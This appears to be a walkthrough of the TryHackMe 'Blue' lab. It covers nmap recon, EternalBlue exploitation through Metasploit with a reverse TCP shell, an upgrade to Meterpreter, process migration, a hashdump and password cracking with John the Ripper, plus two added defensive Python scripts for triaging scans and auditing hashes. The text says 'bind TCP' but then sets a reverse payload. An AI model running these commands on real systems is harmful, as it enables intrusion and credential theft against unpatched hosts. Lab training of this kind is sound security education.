The Blue room in TryHackMe is one of the first rooms to try. It is designed to show you how to hack into a Windows machine using the EternalBlue exploit.
The room is available at https://tryhackme.com/room/blue
First step is recon
sudo nmap -sS -O -sV -T4 -Pn -n X.X.X.X
We are using the following nmap switches:
- -sS – SYN scan (half-open, "semi-stealthy" scan)
- -O – Detect which operating system is running
- -sV – Detect the version of the service listening on each open port
- -T4 – Speed up the scan (aggressive timing template)
- -Pn – Skip the host-discovery ping (the room notes that the box does not respond to pings)
- -n – Disable DNS resolution (we don't need the DNS name)
From the scan results we can see that ports 135, 139 and 445 are open, so it is safe to assume that this is a Windows machine.
sudo nmap -p 135,139,445 --script vuln -oN blueroom.nmap X.X.X.X
We are using the following nmap switches:
- -p 135,139,445 – Scan only these ports, since we know this is a Windows machine
- --script vuln – Run the NSE scripts in the vuln category to check for known issues
- -oN blueroom.nmap – Save the output in Nmap's normal format to a file named blueroom.nmap
Nmap is telling us that the machine is vulnerable to Remote Code Execution (ms17-010). The CVE entry is CVE-2017-0143.
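When this scan is run as a defender across your own hosts, the useful output is a short list of which hosts still report ms17-010 as VULNERABLE. The parser below is an added example, not part of the original walkthrough or of Nmap itself; it reads the -oN (normal) output format, pulls out the host, the open ports and each smb-vuln-* script result, and returns the hosts with a VULNERABLE state. The embedded scan text is constructed for the example (made-up host and version strings in the shape the vuln scan produces), not copied from the room.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of `nmap -oN` output, laid out like the vuln scan in the
# walkthrough; host, versions and script text are made up for this example.
SAMPLE_NMAP = """\
# Nmap 7.93 scan initiated as: nmap -p 135,139,445 --script vuln -oN blueroom.nmap 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.045s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# Script header lines look like "| smb-vuln-ms17-010:" (multi-line result)
# or "|_smb-vuln-ms10-054: false" (single-line result).
SCRIPT_RE = re.compile(r"^\|[ _]\s*(smb-vuln-[\w-]+):")
STATE_RE = re.compile(r"State:\s+(\S+)")
CVE_RE = re.compile(r"(CVE-\d{4}-\d+)")


@dataclass
class HostReport:
    host: str
    open_ports: list = field(default_factory=list)   # (port, proto, service)
    findings: dict = field(default_factory=dict)     # script -> {"state", "cves"}


def parse_nmap_normal(text):
    """Parse nmap -oN output into one HostReport per scanned host."""
    reports, current, script = [], None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = HostReport(m.group(1))
            reports.append(current)
            script = None
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current.open_ports.append((int(m.group(1)), m.group(2), m.group(3)))
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            entry = current.findings.setdefault(script, {"state": None, "cves": []})
            rest = line[m.end():].strip()
            if rest:                      # single-line result carries its value inline
                entry["state"] = rest
            continue
        if script and line.startswith("|"):
            entry = current.findings[script]
            m = STATE_RE.search(line)
            if m:
                entry["state"] = m.group(1)
            for cve in CVE_RE.findall(line):
                if cve not in entry["cves"]:
                    entry["cves"].append(cve)
            continue
        script = None                     # any non-script line ends the block
    return reports


def looks_like_windows(report):
    """The walkthrough's heuristic: 135, 139 and 445 open together."""
    ports = {p for p, _, _ in report.open_ports}
    return {135, 139, 445} <= ports


def vulnerable_findings(reports):
    """(host, script, cves) for every script result whose state is VULNERABLE."""
    out = []
    for r in reports:
        for name, entry in r.findings.items():
            if entry["state"] == "VULNERABLE":
                out.append((r.host, name, list(entry["cves"])))
    return out


if __name__ == "__main__":
    for host, script, cves in vulnerable_findings(parse_nmap_normal(SAMPLE_NMAP)):
        print(f"{host}: {script} VULNERABLE ({', '.join(cves)})")
```

Feed it the real blueroom.nmap file instead of SAMPLE_NMAP and the same functions give you a patch-tracking list; a host that still shows up after the MS17-010 update has been rolled out is the one to chase.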
Second step is exploit time
Now that we know the machine is vulnerable, we can exploit it.
Start by running Metasploit
sudo msfconsole
Now let's see what exploits are available for ms17-010 in Metasploit
search ms17-010
We are going to use the EternalBlue Exploit
use exploit/windows/smb/ms17_010_eternalblue
We could use several different payloads, but I am choosing to use the bind TCP handler.
Now we have to tell Metasploit which machine to attack, so set the remote host to the Blue box IP address and the local host to your own machine's IP
set RHOST X.X.X.X - The target machine IP
set LHOST X.X.X.X - Your machine IP
set PAYLOAD generic/shell_reverse_tcp - Creates a reverse TCP Shell
Now let's exploit the box
exploit
If everything works correctly, you should be dropped into a DOS-style Windows command shell. Note that you may have to reboot the target PC once or twice to get the exploit to work correctly.
Upgrade Privileges
Now it is time to upgrade our access on the system from the plain shell to a Meterpreter session.
First background the current shell: press Ctrl+Z and confirm Yes to Background session X.
Then load the post module with the command
use post/multi/manage/shell_to_meterpreter
Next, we need to show what sessions we have on the target
sessions
and then run the command to see what options we need to configure
show options
Now set the session number you got from the sessions command earlier
set session X
Now let's run the post module
run
Once Metasploit says Stopping exploit/multi/handler, wait 10 seconds and then press Enter. You should be dropped back into msfconsole.
Then run the sessions command again and you should see that you now have two sessions.
Next run the command below, where X is the new (Meterpreter) session number; this will drop you into an interactive session
sessions -i X
To confirm that you have full access to the system, run the command below. It should say you are NT AUTHORITY\SYSTEM.
getuid
Next run ps to get a list of running processes. Look for and record the process IDs of any processes running as NT AUTHORITY\SYSTEM. A good choice is the print spooler service, spoolsv.exe.
ps
Now migrate into that process by running the command below, where XXXX is the process ID you recorded
migrate XXXX
Keeping Access
Now it's time to keep our access; we are going to crack some passwords.
We are going to dump the user names and password hashes for the local users.
So first run the command below
hashdump
Next copy the entire line for Jon and save it into a text file called blue.hash. Now open a new terminal and run the following command. It will use John the Ripper to try to crack the password, using the infamous rockyou password list.
sudo john blue.hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
If you don't have the rockyou.txt file available, run the following to decompress it
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
To show the cracked password, just run the command
sudo john blue.hash --format=NT --show
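Each hashdump line has the layout user:RID:LM-hash:NT-hash:::, which is also the format john reads above. Before handing a dump to a cracker, a defender doing a local-account audit can already learn a lot from the structure alone. The script below is an added example, not part of the walkthrough, Metasploit or John the Ripper: it parses that record format, rejects malformed lines, and flags accounts with an empty password, accounts that still have a real LM hash stored (a weak legacy hash that should be disabled), and accounts whose NT hash is identical to another account's (password reuse). The user names and hash values in the sample are constructed for the example; only the two well-known "empty password" constants are real.

```python
import re
from collections import defaultdict

# Well-known constants: the LM hash stored for an empty password (and for any
# account when LM hashing is disabled), and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in hashdump's user:rid:lm:nt::: layout. The names and the
# non-empty hash values are made up for this example, not taken from any host.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
backup:1001:0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef:::
svc_print:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

HASH_LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump(text):
    """Parse hashdump records; raise ValueError on any line that is not one."""
    accounts = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a hashdump record: {line!r}")
        user, rid, lm, nt = m.groups()
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def audit(accounts):
    """Return (user, issue) pairs for the weaknesses visible without cracking."""
    findings = []
    by_nt = defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings.append((a["user"], "empty password"))
        if a["lm"] != EMPTY_LM:
            # A real LM hash means the password is at most 14 chars, case-folded,
            # and split into two 7-char halves: trivially recoverable.
            findings.append((a["user"], "LM hash stored"))
        by_nt[a["nt"]].append(a["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings.append((u, f"NT hash shared with {others}"))
    return findings


if __name__ == "__main__":
    for user, issue in audit(parse_hashdump(SAMPLE_HASHDUMP)):
        print(f"{user}: {issue}")
```

Empty NT hashes on built-in accounts such as Guest usually mean the account is disabled rather than passwordless, so cross-check the account status before raising it; the shared-hash and LM-stored findings, on the other hand, are worth acting on as they stand.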